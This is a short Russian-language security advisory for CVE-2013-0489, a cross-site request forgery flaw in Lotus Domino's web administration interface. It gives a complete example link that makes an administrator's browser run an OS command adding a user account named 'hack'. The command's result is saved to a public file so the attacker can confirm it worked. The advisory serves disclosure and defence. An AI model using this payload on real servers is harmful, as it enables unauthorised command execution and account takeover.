CVE-2013-0489

Вендор

Lotus Domino

Продукт

Lotus Domino

Тип уязвимости

CSRF (подделка межсайтовых запросов)

Reported

22.04.2010

Date of Public Advisory

24.03.2013

Автор

Александр Поляков

Детальное описание

Сервер уязвим к атаке типа CSRF (подделка межсайтовых запросов). Один из способов реализовать эту атаку - Cross Site Command Execution (межсайтовое выполнение команд). Отправив специальную ссылку администратору, злоумышленник может выполнить любую команду в ОС, где установлен Lotus, и получить результат команды. 

Пример
*********
Злоумышленник может передать администратору следующую ссылку: 
URL=http://server/webadmin.nsf/agReadConsoleData$UserL2?OpenAgent&Mode=QuickConsole&Command=load cmd /c net user hack hack123 /add > C:\Lotus\Domino\data\domino\html\download\filesets\netuser.png&1271932906681 

Если администратор перейдет по ссылке, выполнится команда, добавляющая нового пользователя в ОС. Злоумышленник сможет проверить, выполнена ли она, прочитав файл http://server/download/filesets/netuser.png